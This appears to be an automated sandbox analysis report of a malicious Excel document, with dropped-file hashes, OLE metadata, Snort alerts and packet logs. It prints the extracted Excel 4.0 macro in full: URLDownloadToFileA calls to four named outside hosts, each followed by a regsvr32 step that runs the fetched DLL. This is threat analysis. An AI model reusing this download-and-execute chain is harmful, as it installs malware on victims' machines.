                            C:\Users\user\AppData\Local\Temp\~DF73B80FE68F2FEB1E.TMP

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):28672
                            Entropy (8bit):3.1569743079218417
                            Encrypted:false
                            SSDEEP:768:6kPWKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgAHxKd:6XKpb8rGYrMPe3q7Q0XV5xtezEsi8/dK
                            MD5:12CE0FFD37F123D2F8492F28817265C3
                            SHA1:DF7C171FBB7B6AC05825D1C7ABC7DC60C4603D51
                            SHA-256:507A05F1A092B3CF006BE54D42D986ABF26164ACE6C2943D9832D59A8815A1AC
                            SHA-512:13CC319134AEE2BD12A6678D797EA381739790BBE3DD1E1A0E0BDA29630383F13855B280FAF62C5B8F1492C59EEC4FA64B6E3A932629B807409BAA5B106A66C7
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\9X79YCCF.txt

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):303
                            Entropy (8bit):5.738319644141656
                            Encrypted:false
                            SSDEEP:6:7xHBO5YvsDCThKvfZ5WZAwT0JixqT/0IgAovhScJJuSXbWZF9L6Z2v3/n:IYkaQvf/Wfqr0dV5kSXbWpNn
                            MD5:F060C5E60952BD197257D1F9D53933AC
                            SHA1:3E1DB6C98E792C52180B50DA23289D5BABA491CB
                            SHA-256:D0BB818407875D5D5DE2320E94F9A4259AE09DD07AEE0BC3517200670ECECF52
                            SHA-512:51D6687A2A513DF5A22B510AC94DD9CB6F7D97D8502C6E192E81761DE8840016360B227328B28D60BAEF5130CC17760A7736A078F6245E554B039D83146C408E
                            Malicious:false
                            Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAilMIA%2BG6u6fOffdeloSSLftgvfHedjHZsx%2FnHB3u6bs5u%2F94PwbzL8h8iuQj5fU6ouxPvjTOMmxa%2BzRYyONLyaAb0hg9MOCCN3g2h1jkAF3E%3D000114.www.spinbalence.com/.9217.3608004736.31000734.3937766441.30996786.*.

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\D3A8EJJ9.txt

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):233
                            Entropy (8bit):5.458604286084197
                            Encrypted:false
                            SSDEEP:6:7KH2jzcdWTKYffJKETQeitrYHgUXjOth4aESVlL06c/n:OH2jLTftUePUdESHD6n
                            MD5:5860E869AD5D3292E26FD527F3120E3A
                            SHA1:A547C6E62D97DFBF53E061DFA7695E7CE7406B2F
                            SHA-256:0347BBF9AF1F39621143CA495A9617F89A182AEE5A54A71282B1EB18A88C00D9
                            SHA-512:6AEB31452E95B4A05194ADD0047F95890FCDD0B726CDA712B285C90BF982A537127971F0642443912AC5981A1603774CFFBE4D8D96002D80890242743E66FC80
                            Malicious:false
                            Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hqQ6wpX78PX55d2aotWs5IA%3D000075.www.3d-stickers.com/.9729.3618004736.31000734.3945878115.30996786.*.

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FJW3SUUT.txt

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):231
                            Entropy (8bit):5.5180081754315795
                            Encrypted:false
                            SSDEEP:6:7xHBO5YvsDCTh9HhVxUG9/6/DVh4gJJuSV09L6lH/n:IYkaJfly7V7kS42n
                            MD5:0C778372AE083EFCA2640D5CE8B5ABAC
                            SHA1:66E81472B754198F764726ADFAEAC6B179E2DBCA
                            SHA-256:A4F156650E92E15E94ED932B57C48D023CD41602EB5B408A73EC5D77451F6925
                            SHA-512:0202B8D386FC2D1EE34DC4EAFAF27C5C1039595FDD65C7E194330E0F5FFF7382E9474AF21E37357F3E0C0DF9FD7404BAA8876F8B5AC8B11092A7F6F7A820D97A
                            Malicious:false
                            Preview:PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162.Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAiRnV0TG5b0npswANceXA1cwrQZJXojk9hvRnyRY37Ivk%3D000075.www.spinbalence.com/.9729.3608004736.31000734.3932774008.30996786.*.

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\JZYF2U5D.txt

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):301
                            Entropy (8bit):5.6924231987102205
                            Encrypted:false
                            SSDEEP:6:7KH2jzcdWTKYffJKETQeiHMbCXJDw0a/PSUPFvca8ESXbWbnL8FUq/n:OH2jLTftUecgqUPP8ESXbWbnoFUon
                            MD5:5099D4482BDDF985ABAF86BA7B808466
                            SHA1:9FAE3D11E4CF94F58D631C2B57BE423B4E370A99
                            SHA-256:B41EF0F154947AC3741BBB23F88594A5542D00B27B449B4C8D299B477287A91C
                            SHA-512:7C5529EF35849BEF3053925106D7D6069390552A8E7461C87ACA6EAD6789150EEEB60E66F61AFF2863D2FED2B543F9C99D53AC0A683352026C42FC9F440A3BF2
                            Malicious:false
                            Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSdLdi59jw6GotzqA%2F%2BTveez7WUZj7S8ZwYcZXe6FVfsrOzQXtIeedQAsmUAviISLMDAANABHdlwwYRACr4DLkzU%3D000115.www.3d-stickers.com/.9217.3628004736.31000734.3952273981.30996786.*.

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\RLNYM7EL.txt

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):233
                            Entropy (8bit):5.48906588343199
                            Encrypted:false
                            SSDEEP:6:7KH2jzcdWTKYffJse3j6oLRMmmicPyhEOESgL3ddD2ic/n:OH2jLTfqeTD9nhdESg7dR2i6n
                            MD5:EE501A92AEFD9B58974229415DAA85F2
                            SHA1:6177154202892F12E1FE3F8A87766445B255A2E7
                            SHA-256:C0F9574BA2DCC4F298FB3F743AAD7FDBCA53F48EA2B8378D7FF7027C45E04CC4
                            SHA-512:E13F7BD9FFFD8C95CE79E2CF5F1E42D953A75AA7A01CC3177380F30AE8B9181C352B689F6F716843B937B70E92C257F602B41D353D5991492F1FF2BBA68524C4
                            Malicious:false
                            Preview:PrestaShop-a30a9934ef476d11b6cc3c983616e364.9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtmJfdpSnAaKPknzS3gL2v8c%3D000079.www.3d-stickers.com/.9728.3618004736.31000734.3940886227.30996786.*.

                            C:\Users\user\Desktop\4470_02112022.xls

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                            Category:dropped
                            Size (bytes):221696
                            Entropy (8bit):7.123704337595423
                            Encrypted:false
                            SSDEEP:6144:EKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQmc:RbGUMVWlbc
                            MD5:E71BDD02C3D0754E802600DF8BF4CA71
                            SHA1:1B23F0CC4D900480EE409EDAAE3ECE48FEE2685C
                            SHA-256:77F55AF0AA76FD20853C07984463AA93FB7666C749DCBFFE85DBC610BC971BD3
                            SHA-512:E04983B87C2A155CDD8156FBD04699DCB14E037662BF9A30054FA692542B1D23BC777E0798C61A5EBD042F3FB3F695B67500727738371E760ACAAC77078E0FFB
                            Malicious:true
                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=........................-.B.0...=.8.3.0.....................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..............

                            C:\Users\user\oxnv4.ooccxx

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):769024
                            Entropy (8bit):6.637885736387009
                            Encrypted:false
                            SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                            MD5:22CE6200C1714603F94B11F6DF41140F
                            SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                            SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                            SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            • Antivirus: Metadefender, Detection: 20%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................

                            C:\Windows\System32\XXKTOC\CASBb.dll (copy)

                            Download File
                            Process:C:\Windows\System32\regsvr32.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):769024
                            Entropy (8bit):6.637885736387009
                            Encrypted:false
                            SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                            MD5:22CE6200C1714603F94B11F6DF41140F
                            SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                            SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                            SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            • Antivirus: Metadefender, Detection: 20%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 2 06:43:53 2022, Security: 0
                            Entropy (8bit):7.123491668947418
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:4470_02112022.xls
                            File size:221696
                            MD5:d3b182de8c99553a9f2b6d0f3f030a4f
                            SHA1:d5bd989ffde2f67133b6404f9f234d13e618c206
                            SHA256:cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d
                            SHA512:3abe78e4fca03e90d59818cded37a9feff6f7ade11cee1ef07c7ccd70cc4e250f7d835161409f0e8ba97cff4a678ef234298cb293ecac60e1ec0667a8904e484
                            SSDEEP:6144:WKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgUyY+TAQXTHGUMEyP5p6f5jQm+:XbGUMVWlb+
                            TLSH:5A24F15B77999D6DF529C33408E7035AB233FD008F6B078B3649B395AFB48A05E13246
                            File Content Preview:........................>......................................................................................................................................................................................................................................

                            File Icon

                            Icon Hash:e4eea286a4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "4470_02112022.xls"

                            Indicators
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:False
                            Summary
                            Code Page:1251
                            Author:
                            Last Saved By:
                            Create Time:2015-06-05 18:19:34
                            Last Saved Time:2022-11-02 06:43:53
                            Creating Application:
                            Security:0
                            Document Summary
                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Company:
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:1048576

                            Streams

                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.3944713856337448
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e
                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 20 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e0 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.2780102568870367
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G y d a r . . . . . . . . . . . G y d a r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . Z x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 210174
                            General
                            Stream Path:Workbook
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:210174
                            Entropy:7.334559302852785
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G y d a r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V e 1 8 . . . . . . . X . @ . . .
                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 47 79 64 61 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                            Macro 4.0 Code

                            Name:Sheet6
                            Extraction:dynamic
                            Type:4
                            Final:False
                            Visible:False
                            Protected:False
                            12,6,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)",G16)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv1.ooccxx")",G18)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)",G20)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv2.ooccxx")",G22)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)",G24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv3.ooccxx")",G26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)",G28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv4.ooccxx")",G30)=FORMULA("=RETURN()",G36)
                            Name:Sheet6
                            Extraction:dynamic
                            Type:4
                            Final:False
                            Visible:False
                            Protected:False
                            12,6,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)",G16)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv1.ooccxx")",G18)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)",G20)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv2.ooccxx")",G22)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)",G24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv3.ooccxx")",G26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)",G28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe"&Sheet3!P21&" ..\oxnv4.ooccxx")",G30)=FORMULA("=RETURN()",G36)
15,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sat7ate.com/wordpress/ZAf5j4MG8Hwnig/","..\oxnv1.ooccxx",0,0)
17,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx")
19,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.spinbalence.com/Adapter/moycMR/","..\oxnv2.ooccxx",0,0)
21,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx")
23,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.3d-stickers.com/Content/Afa1PcRuxh/","..\oxnv3.ooccxx",0,0)
25,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx")
27,6,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://navylin.com/bsavxiv/axHQYKl/","..\oxnv4.ooccxx",0,0)
29,6,=EXEC("C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx")
35,6,=RETURN()
                            Name:Sheet6, Macrosheet
                            Extraction:static
                            Type:unknown
                            Final:unknown
                            Visible:True
                            Protected:unknown
                            SHEET: Sheet6, Macrosheet
CELL:G13, =(((((((FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!F26)&'Sheet3'!R13)&'Sheet5'!E9)&'Sheet3'!M26,G16)=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!E9)&'Sheet1'!F24)&'Sheet1'!L31,G18))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!G28)&'Sheet3'!R13)&'Sheet5'!G15)&'Sheet3'!M26,G20))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!G15)&'Sheet1'!F24)&'Sheet1'!L31,G22))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!I27)&'Sheet3'!R13)&'Sheet5'!J3)&'Sheet3'!M26,G24))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!J3)&'Sheet1'!F24)&'Sheet1'!L31,G26))=FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10)&'Sheet2'!R3)&'Sheet5'!Q21)&'Sheet2'!J29)&'Sheet3'!R13)&'Sheet5'!L12)&'Sheet3'!M26,G28))=FORMULA((((((((((((((((((('Sheet1'!L24&'Sheet1'!G8)&'Sheet1'!F4)&'Sheet1'!G8)&'Sheet1'!L26)&'Sheet1'!L30)&'Sheet1'!F24)&'Sheet1'!L26)&'Sheet3'!F19)&'Sheet3'!D5)&'Sheet1'!A4)&'Sheet3'!J14)&'Sheet1'!A4)&'Sheet3'!C32)&'Sheet1'!F10)&'Sheet3'!P21)&'Sheet3'!L8)&'Sheet5'!L12)&'Sheet1'!F24)&'Sheet1'!L31,G30))=FORMULA((('Sheet1'!L24&'Sheet1'!G44)&'Sheet1'!H46)&'Sheet1'!J44,G36), 0

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.22218.38.121.17491804432404328 11/15/22-12:44:34.987459TCP2404328ET CNC Feodo Tracker Reported CnC Server TCP group 1549180443192.168.2.22218.38.121.17

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 15, 2022 12:43:48.896744967 CET4917380192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:48.924519062 CET8049173163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:48.924680948 CET4917380192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:48.924941063 CET4917380192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.059000969 CET8049173163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.175769091 CET8049173163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.175973892 CET4917380192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.197150946 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.197247028 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.197365046 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.206044912 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.206103086 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.312062025 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.312254906 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.321223974 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.321261883 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.321779013 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.321868896 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.604454994 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.604516983 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.711946011 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.712014914 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.712037086 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.712057114 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.712088108 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.712114096 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.750016928 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.750058889 CET44349174163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.750092030 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.750108957 CET49174443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.751055956 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.751118898 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.751180887 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.751363039 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.751378059 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.814203024 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.814301968 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.822736025 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.822768927 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:49.853514910 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:49.853539944 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:50.169955015 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:50.170157909 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:50.170188904 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:50.170248032 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:50.198544025 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:50.198604107 CET44349175163.172.115.127192.168.2.22
                            Nov 15, 2022 12:43:50.198695898 CET49175443192.168.2.22163.172.115.127
                            Nov 15, 2022 12:43:50.198731899 CET44349175163.172.115.127192.168.2.22
